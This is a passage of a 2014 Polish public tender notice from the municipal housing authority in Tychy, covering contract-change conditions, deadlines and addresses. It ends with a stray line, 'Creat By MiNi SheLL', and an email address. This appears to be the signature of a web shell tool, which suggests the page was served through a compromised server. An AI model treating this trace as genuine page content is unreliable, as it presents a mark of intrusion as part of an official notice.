-	z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów;  
lub
-	wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego; 
d)	wykonania robót zamiennych;
e)	w sytuacji udokumentowanego wystąpienia niesprzyjających warunków atmosferycznych (tj. opady deszczu, śniegu, niskie temperatury) uniemożliwiających wykonywanie robót na zewnątrz budynku - zgodnie z technologią i sztuką budowlaną, pod warunkiem terminowego, zgodnego z umową terminu rozpoczęcia robót,   
5)	     zmiany podwykonawcy robót, w trakcie trwania umowy - za zgodą Zamawiającego;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2014 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com